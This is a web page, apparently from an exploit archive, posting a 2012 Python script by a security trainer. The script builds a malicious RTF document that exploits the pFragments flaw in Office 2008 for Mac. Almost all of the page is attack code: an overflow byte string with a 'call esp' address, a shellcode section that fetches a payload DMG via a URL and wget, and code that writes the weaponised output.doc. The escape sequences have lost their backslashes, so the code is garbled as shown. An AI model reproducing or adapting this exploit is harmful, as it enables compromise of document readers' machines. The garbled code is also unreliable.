Home / exploits Office 2008 SP0 RTF Pfragments MAC Exploit
Posted on 20 April 2012
#RTF Pfragments exploit for MAC office 2008 #Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com #Advanced Hacking Trainings - http://training.aslitsecurity.com/ #Web - http://www.aslitsecurity.com/ #Blog - http://www.aslitsecurity.blogspot.com/ #Office 2007 for MC SP 0 #!/usr/bin/python myfile = ( "x7bx5cx72x74x66x31x7bx5cx73x68x70x7bx5cx73x70x7b" "x5cx73x6ex20x70x46x72x61x67x6dx65x6ex74x73x7dx7b" "x5cx73x76x20x39x3bx32x3bx31x31x31x31x31x31x31x31" "x37x35x30x30x32x32x32x32x32x32x32x32x32x32x32x32" "x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32" "x32x32x32x32x32x32x32x32x32x32x32x32" "f069837c" # call esp "x31x31x31x31x31x31x31x31x31x31x31x31" "x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31" "x31x31x31x31x30x30x30x30x30x30x30x30x62x61x30x30" "x30x30x35x30x30x30x36x36x38x31x63x61x66x66x30x66" "x34x32x35x32x36x61x30x32x35x38x63x64x32x65x33x63" "x30x35x35x61x37x34x65x66x62x38x37x30x36x39x36x65" "x36x37x38x62x66x61x61x66x37x35x65x61x61x66x37x35" "x65x37x35x37x63x33x7dx7dx7dx7d" ) sign = ( "x70x69x6ex67x70x69x6ex67" ) shellcode = "xCCxCCxCCxCC" shellcode += "http://www.site.com/payload.DMG" shellcode += "x11x3Ax65x89x11x3Ax65x89x11x3Ax65x89" #("wget http://") shellcode += "wget " shellcode += "x1Ax18x19x02" exploit = open("output.doc", mode="wb") exploit.write(myfile + sign + shellcode) print "Done"
